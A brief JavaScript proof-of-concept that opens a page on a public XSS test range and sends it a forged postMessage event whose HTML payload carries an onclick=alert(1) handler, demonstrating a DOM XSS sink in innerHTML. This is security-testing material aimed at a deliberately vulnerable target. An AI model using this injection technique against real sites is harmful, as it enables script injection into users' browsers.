/* eslint-disable */
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
/* eslint-disable */
async function demo() {
  var x = window.open(
"https://public-firing-range.appspot.com/dom/toxicdom/postMessage/innerHtml");
  var e = new Event('message');
  e.data = '{"html": "<button onclick=alert(1)>Click me</button>"}';
  await sleep(2000);
  x.dispatchEvent(e);
}
/* eslint-disable */
demo();